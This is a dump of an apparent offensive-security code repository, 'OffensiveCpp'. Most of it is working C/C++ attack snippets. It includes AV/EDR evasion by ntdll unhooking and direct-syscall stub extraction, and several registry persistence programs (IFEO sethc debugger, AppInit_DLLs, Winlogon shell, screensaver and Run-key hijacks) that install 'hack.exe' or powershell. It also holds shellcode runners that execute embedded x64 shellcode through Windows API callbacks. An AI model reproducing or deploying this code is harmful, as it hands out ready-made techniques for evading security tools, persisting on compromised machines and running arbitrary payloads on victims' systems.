PVOID RVAtoRawOffset(DWORD_PTR RVA, PIMAGE_SECTION_HEADER section) 14 | { 15 | return (PVOID)(RVA - section->VirtualAddress + section->PointerToRawData); 16 | } 17 | 18 | BOOL GetSyscallStub(LPCSTR functionName, LPVOID syscallStub) 19 | { 20 | HANDLE file = NULL; 21 | DWORD fileSize = NULL; 22 | DWORD bytesRead = NULL; 23 | LPVOID fileData = NULL; 24 | 25 | file = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 26 | fileSize = GetFileSize(file, NULL); 27 | fileData = HeapAlloc(GetProcessHeap(), 0, fileSize); 28 | ReadFile(file, fileData, fileSize, &bytesRead, NULL); 29 | 30 | PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)fileData; 31 | PIMAGE_NT_HEADERS imageNTHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)fileData + dosHeader->e_lfanew); 32 | DWORD exportDirRVA = imageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 33 | PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(imageNTHeaders); 34 | PIMAGE_SECTION_HEADER textSection = section; 35 | PIMAGE_SECTION_HEADER rdataSection = section; 36 | 37 | for (int i = 0; i < imageNTHeaders->FileHeader.NumberOfSections; i++) 38 | { 39 | if (strcmp((CHAR*)section->Name, (CHAR*)".rdata") == 0) { 40 | rdataSection = section; 41 | break; 42 | } 43 | section++; 44 | } 45 | 46 | PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)RVAtoRawOffset((DWORD_PTR)fileData + exportDirRVA, rdataSection); 47 | 48 | PDWORD addressOfNames = (PDWORD)RVAtoRawOffset((DWORD_PTR)fileData + *(&exportDirectory->AddressOfNames), rdataSection); 49 | PDWORD addressOfFunctions = (PDWORD)RVAtoRawOffset((DWORD_PTR)fileData + *(&exportDirectory->AddressOfFunctions), rdataSection); 50 | BOOL stubFound = FALSE; 51 | 52 | for (size_t i = 0; i < exportDirectory->NumberOfNames; i++) 53 | { 54 | DWORD_PTR functionNameVA = (DWORD_PTR)RVAtoRawOffset((DWORD_PTR)fileData + addressOfNames[i], rdataSection); 55 | DWORD_PTR functionVA = (DWORD_PTR)RVAtoRawOffset((DWORD_PTR)fileData + addressOfFunctions[i + 1], textSection); 56 | LPCSTR functionNameResolved = (LPCSTR)functionNameVA; 57 | if (strcmp(functionNameResolved, functionName) == 0) 58 | { 59 | memcpy(syscallStub, (LPVOID)functionVA, SYSCALL_STUB_SIZE); 60 | stubFound = TRUE; 61 | } 62 | } 63 | 64 | return stubFound; 65 | } -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/LoadLibraryA Syscalls/ZWALLOCATEVIRTUALMEMORY/ZWALLOCATEVIRTUALMEMORY.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "ntdll.lib") 8 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 9 | 10 | typedef NTSTATUS(WINAPI* ZWALLOCATEVIRTUALMEMORY)( 11 | HANDLE ProcessHandle, 12 | PVOID* BaseAddress, 13 | ULONG_PTR ZeroBits, 14 | PSIZE_T RegionSize, 15 | ULONG AllocationType, 16 | ULONG Protect); 17 | 18 | unsigned char buf[] = ""; 19 | 20 | int main(int argc, char *argv[]) { 21 | 22 | PVOID pBaseAddress = nullptr; 23 | SIZE_T regionSize = sizeof(buf); 24 | ULONG allocationType = MEM_COMMIT | MEM_RESERVE; 25 | ULONG protect = PAGE_EXECUTE_READWRITE; 26 | 27 | 28 | // Get NTDLL 29 | HMODULE hNtDll = LoadLibrary(L"ntdll.dll"); 30 | if (hNtDll == NULL) 31 | { 32 | std::cerr << "LoadLibrary failed: " << GetLastError() << std::endl; 33 | return 1; 34 | } 35 | 36 | // Defines 37 | ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtDll, "ZwAllocateVirtualMemory"); 38 | if (ZwAllocateVirtualMemory == nullptr) { 39 | std::cerr << "Failed to load ZwAllocateVirtualMemory function" << std::endl; 40 | return 1; 41 | } 42 | 43 | HANDLE h_process = ::GetCurrentProcess(); 44 | 45 | NTSTATUS status = ZwAllocateVirtualMemory(h_process, &pBaseAddress, 0, ®ionSize, allocationType, protect); 46 | if (status == STATUS_SUCCESS) { 47 | std::cout << "Virtual memory allocated successfully at address " << pBaseAddress << std::endl; 48 | } 49 | else { 50 | std::cerr << "Failed to allocate virtual memory. Status: " << std::hex << status << std::endl; 51 | return 1; 52 | } 53 | 54 | return 0; 55 | } 56 | -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/LoadLibraryA Syscalls/ZWWRITEVIRTUALMEMORY/ZWWRITEVIRTUALMEMORY.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "ntdll.lib") 8 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 9 | 10 | typedef NTSTATUS(WINAPI* ZWWRITEVIRTUALMEMORY)( 11 | HANDLE ProcessHandle, 12 | PVOID BaseAddress, 13 | PVOID Buffer, 14 | ULONG BufferSize, 15 | PULONG NumberOfBytesWritten); 16 | 17 | unsigned char buf[] = ""; 18 | 19 | int main(int argc, char *argv[]) { 20 | 21 | PVOID pBaseAddress = nullptr; 22 | ULONG bytesWritten = 0; 23 | 24 | 25 | // Get NTDLL 26 | HMODULE hNtDll = LoadLibrary(L"ntdll.dll"); 27 | if (hNtDll == NULL) 28 | { 29 | std::cerr << "LoadLibrary failed: " << GetLastError() << std::endl; 30 | return 1; 31 | } 32 | 33 | // Defines 34 | ZWWRITEVIRTUALMEMORY ZwWriteVirtualMemory = (ZWWRITEVIRTUALMEMORY)GetProcAddress(hNtDll, "NtWriteVirtualMemory"); 35 | if (ZwWriteVirtualMemory == nullptr) { 36 | std::cerr << "Failed to load NtWriteVirtualMemory function" << std::endl; 37 | return 1; 38 | } 39 | 40 | HANDLE h_process = ::GetCurrentProcess(); 41 | LPVOID alloc = ::VirtualAllocEx(h_process, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 42 | 43 | NTSTATUS status = ZwWriteVirtualMemory(h_process, alloc, buf, sizeof(buf), &bytesWritten); 44 | if (status == STATUS_SUCCESS) { 45 | std::cout << "Wrote " << bytesWritten << " bytes to virtual memory at address " << pBaseAddress << std::endl; 46 | } 47 | else { 48 | std::cerr << "Failed to write virtual memory. Status: " << std::hex << status << std::endl; 49 | return 1; 50 | } 51 | 52 | return 0; 53 | } 54 | -------------------------------------------------------------------------------- /Evasion Techniques/Unhooking/Unhook_ntdll.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Source: https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++ 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | int main(int argc, char* argv[]) 10 | { 11 | HANDLE process = GetCurrentProcess(); 12 | MODULEINFO mi = {}; 13 | HMODULE ntdllModule = GetModuleHandleA("ntdll.dll"); 14 | 15 | GetModuleInformation(process, ntdllModule, &mi, sizeof(mi)); 16 | LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll; 17 | HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); 18 | HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL); 19 | LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0); 20 | 21 | 22 | PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase; 23 | PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew); 24 | 25 | for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) { 26 | PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i)); 27 | 28 | if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) { 29 | DWORD oldProtection = 0; 30 | bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection); 31 | memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize); 32 | isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection); 33 | } 34 | } 35 | 36 | CloseHandle(process); 37 | CloseHandle(ntdllFile); 38 | CloseHandle(ntdllMapping); 39 | FreeLibrary(ntdllModule); 40 | } 41 | -------------------------------------------------------------------------------- /Evasion Techniques/WinAPI Hashing/myhash.py: -------------------------------------------------------------------------------- 1 | # simple stupid hashing example 2 | def myHash(data): 3 | hash = 0x35 4 | for i in range(0, len(data)): 5 | hash += ord(data[i]) + (hash << 1) 6 | print (hash) 7 | return hash 8 | 9 | myHash("VirtualAlloc") -------------------------------------------------------------------------------- /Misc Techniques/Execute_cmd.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | SHELLEXECUTEINFOW info = { sizeof(SHELLEXECUTEINFOW) }; 6 | info.lpFile = L"cmd.exe"; 7 | info.lpParameters = L"/c whoami"; 8 | info.nShow = SW_HIDE; 9 | info.lpVerb = L"open"; 10 | ::ShellExecuteEx(&info); 11 | } 12 | -------------------------------------------------------------------------------- /Persistence/admin_persistence_accessibility_features.c: -------------------------------------------------------------------------------- 1 | /* 2 | * windows persistence via Accessibility Features 3 | * Administrator level privileges are necessary to implement this trick. 4 | * author: @cocomelonc 5 | */ 6 | #include 7 | #include 8 | 9 | int main(int argc, char* argv[]) { 10 | HKEY hkey = NULL; 11 | 12 | // image file 13 | const char* img = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe"; 14 | 15 | // evil app 16 | const char* exe = "C:\\Windows\\System32\\hack.exe"; 17 | 18 | // Debugger 19 | LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL); 20 | if (res == ERROR_SUCCESS) { 21 | // create new registry key 22 | // reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /d "hack.exe" 23 | RegSetValueEx(hkey, (LPCSTR)"Debugger", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 24 | RegCloseKey(hkey); 25 | } 26 | 27 | return 0; 28 | } -------------------------------------------------------------------------------- /Persistence/admin_persistence_appinit_dlls.c: -------------------------------------------------------------------------------- 1 | /* 2 | * windows persistense via Appinit_DLLs 3 | * Administrator level privileges are necessary to implement this trick. 4 | * author: @cocomelonc 5 | */ 6 | #include 7 | #include 8 | 9 | int main(int argc, char* argv[]) { 10 | HKEY hkey = NULL; 11 | // malicious DLL 12 | const char* dll = "C:\\hack.dll"; 13 | // activation 14 | DWORD act = 1; 15 | 16 | // 32-bit and 64-bit 17 | LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0 , KEY_WRITE, &hkey); 18 | if (res == ERROR_SUCCESS) { 19 | // create new registry keys 20 | RegSetValueEx(hkey, (LPCSTR)"LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE*)&act, sizeof(act)); 21 | RegSetValueEx(hkey, (LPCSTR)"AppInit_DLLs", 0, REG_SZ, (unsigned char*)dll, strlen(dll)); 22 | RegCloseKey(hkey); 23 | } 24 | 25 | res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0 , KEY_WRITE, &hkey); 26 | if (res == ERROR_SUCCESS) { 27 | // create new registry keys 28 | RegSetValueEx(hkey, (LPCSTR)"LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE*)&act, sizeof(act)); 29 | RegSetValueEx(hkey, (LPCSTR)"AppInit_DLLs", 0, REG_SZ, (unsigned char*)dll, strlen(dll)); 30 | RegCloseKey(hkey); 31 | } 32 | return 0; 33 | } -------------------------------------------------------------------------------- /Persistence/admin_persistence_winlogon.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // This POC executes powershell.exe on system logon 5 | // It requires administrative privileges 6 | // https://youtu.be/VqDY2Tfz6Qw?t=20 7 | 8 | int main() { 9 | HKEY hKey; 10 | LPCSTR subKey = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"; 11 | LPCSTR valueName = "Shell"; 12 | LPCSTR newValue = "explorer.exe,powershell.exe"; 13 | 14 | LONG openResult = RegOpenKeyExA(HKEY_LOCAL_MACHINE, subKey, 0, KEY_SET_VALUE, &hKey); 15 | if (openResult != ERROR_SUCCESS) { 16 | printf("Error opening registry key. Error code: %d\n", openResult); 17 | return 1; 18 | } 19 | 20 | LONG setResult = RegSetValueExA(hKey, valueName, 0, REG_SZ, (BYTE*)newValue, strlen(newValue) + 1); 21 | if (setResult != ERROR_SUCCESS) { 22 | printf("Error setting registry value. Error code: %d\n", setResult); 23 | RegCloseKey(hKey); 24 | return 1; 25 | } 26 | 27 | printf("Registry value changed successfully.\n"); 28 | 29 | RegCloseKey(hKey); 30 | return 0; 31 | } -------------------------------------------------------------------------------- /Persistence/screensaver_hijacking.c: -------------------------------------------------------------------------------- 1 | /* 2 | * windows low level persistense via screensaver 3 | * simple PoC 4 | * author: @cocomelonc 5 | * based on https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html 6 | * used by Turla APT in the wild 7 | */ 8 | #include 9 | #include 10 | 11 | int main(int argc, char* argv[]) { 12 | HKEY hkey = NULL; 13 | // malicious app 14 | const char* exe = "Z:\\hack.exe"; 15 | // timeout 16 | const char* ts = "10"; 17 | // activation 18 | const char* aact = "1"; 19 | 20 | // startup 21 | LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"Control Panel\\Desktop", 0 , KEY_WRITE, &hkey); 22 | if (res == ERROR_SUCCESS) { 23 | // create new registry keys 24 | RegSetValueEx(hkey, (LPCSTR)"ScreenSaveActive", 0, REG_SZ, (unsigned char*)aact, strlen(aact)); 25 | RegSetValueEx(hkey, (LPCSTR)"ScreenSaveTimeOut", 0, REG_SZ, (unsigned char*)ts, strlen(ts)); 26 | RegSetValueEx(hkey, (LPCSTR)"SCRNSAVE.EXE", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 27 | RegCloseKey(hkey); 28 | } 29 | return 0; 30 | } -------------------------------------------------------------------------------- /Persistence/user_persistence_run.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // This POC executes powershell.exe when the specific user logs in again 5 | // It does not require administrative privileges 6 | // https://youtu.be/VqDY2Tfz6Qw?t=225 7 | 8 | 9 | int main() { 10 | HKEY hKey; 11 | LPCSTR subKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; 12 | LPCSTR valueName = "test"; 13 | LPCSTR valueData = "powershell.exe"; 14 | 15 | LONG openResult = RegCreateKeyExA(HKEY_CURRENT_USER, subKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL); 16 | if (openResult != ERROR_SUCCESS) { 17 | printf("Error creating/opening registry key. Error code: %d\n", openResult); 18 | return 1; 19 | } 20 | 21 | LONG setResult = RegSetValueExA(hKey, valueName, 0, REG_SZ, (BYTE*)valueData, strlen(valueData) + 1); 22 | if (setResult != ERROR_SUCCESS) { 23 | printf("Error setting registry value. Error code: %d\n", setResult); 24 | RegCloseKey(hKey); 25 | return 1; 26 | } 27 | 28 | printf("Registry key added successfully.\n"); 29 | 30 | RegCloseKey(hKey); 31 | return 0; 32 | } 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OffensiveCpp 2 | Offensive C++ is a collection of offensive security snippets written in C++. It includes various tools for penetration testing and exploit development. 3 | 4 | # Table of Contents 5 | * [OffensiveCpp](#offensivecpp) 6 | * [Introduction](#introduction) 7 | * [Why C/C++?](#why-cc) 8 | * [Compiling](#compiling) 9 | * [Reference Libraries](#reference-libraries) 10 | * [Contributing](#contributing) 11 | * [License](#license) 12 | 13 | # Introduction 14 | The purpose of this project is to provide colleciton of snippets that can be used for penetration testing and exploit development. Currently, the project contains snippets for: 15 | * AV/EDR Evasion 16 | * Enumeration 17 | * Sandbox Evasion 18 | * Shellcode Execution 19 | * WinAPI Examples 20 | 21 | # Why C/C++? 22 | * C/C++ is a compiled language, which means that it can produce code that is optimized for the specific target platform. 23 | 24 | * C/C++ is a low-level programming language that offers a high degree of control over system resources. 25 | 26 | * C/C++ allows direct memory manipulation and flexibility. 27 | 28 | * C/C++ provides a high level of performance and efficiency. 29 | 30 | * C/C++ offers the ability to easily interface with other low-level languages like assembly. 31 | 32 | * C/C++ has a large and active community of developers, which means that there is a wealth of resources, libraries, and tools available for exploit development. 33 | 34 | # Compiling 35 | This repo does not come with precompiled binaries. Before compiling, make sure you have: 36 | 1. A C++ compiler: Microsoft Visual C++ compiler is included in Microsoft Visual Studio or you can install the GCC compiler through MinGW or Cygwin. 37 | 38 | 2. An Integrated Development Environment (IDE), in my case "Visual Studio 2017". 39 | 40 | 3. The Windows SDK: The Windows SDK includes headers, libraries, and tools that are necessary for developing Windows applications in C++. 41 | 42 | # Reference Libraries 43 | Here you can find a list of external open source project I have included. 44 | * [Shellcode Execution](https://github.com/aahmad097/AlternativeShellcodeExec) 45 | * [Sandbox Evasion](https://github.com/Arvanaghi/CheckPlease/tree/master/C) 46 | * [Unhooking NTDLL.dll](https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++) 47 | * [Direct Syscalls](https://github.com/JohnWoodman/stealthInjector) 48 | 49 | # Support 50 | You can support my work by becomming my [Patreon](https://www.patreon.com/Lsecqt). 51 | By doing so, you get access to my private packer, while keeping me motivated to produce more and better content. 52 | 53 | # Contributing 54 | Contributions to Offensive C++ are welcome. To contribute, please fork the repository and submit a pull request. Please make sure that your code is well-documented and tested. 55 | 56 | # License 57 | Offensive C++ is released under the MIT License (https://opensource.org/license/mit/). Please see the LICENSE file for more information. -------------------------------------------------------------------------------- /Shellcode Execution/CertEnumSystemStore/CertEnumSystemStore.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Requires Crypt32.lib 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | int main() { 32 | 33 | 34 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | ::RtlMoveMemory(addr, op, sizeof(op)); 36 | 37 | ::CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)addr); 38 | 39 | 40 | } -------------------------------------------------------------------------------- /Shellcode Execution/CertEnumSystemStore/CertEnumSystemStore.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CertEnumSystemStoreLocation/CertEnumSystemStoreLocation.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // requires Crypt32.lib 6 | 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | ::RtlMoveMemory(addr, op, sizeof(op)); 37 | 38 | ::CertEnumSystemStoreLocation(NULL, nullptr, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)addr); 39 | 40 | } -------------------------------------------------------------------------------- /Shellcode Execution/CertEnumSystemStoreLocation/CertEnumSystemStoreLocation.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CopyFile2/CopyFile2.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | int err(const char* errmsg) { 7 | 8 | 9 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 10 | return 1; 11 | 12 | } 13 | 14 | 15 | // alfarom256 calc shellcode 16 | unsigned char op[] = 17 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 18 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 19 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 20 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 21 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 22 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 23 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 24 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 25 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 26 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 27 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 28 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 29 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 30 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 31 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 32 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 33 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 34 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 35 | "\x63\x2e\x65\x78\x65\x00"; 36 | 37 | 38 | 39 | int main() { 40 | 41 | 42 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 43 | ::RtlMoveMemory(addr, op, sizeof(op)); 44 | 45 | COPYFILE2_EXTENDED_PARAMETERS params; 46 | 47 | params.dwSize = { sizeof(params) }; 48 | params.dwCopyFlags = COPY_FILE_FAIL_IF_EXISTS; 49 | params.pfCancel = FALSE; 50 | params.pProgressRoutine = (PCOPYFILE2_PROGRESS_ROUTINE)addr; 51 | params.pvCallbackContext = nullptr; 52 | 53 | ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log"); 54 | ::CopyFile2(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", ¶ms); 55 | 56 | } -------------------------------------------------------------------------------- /Shellcode Execution/CopyFile2/CopyFile2.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 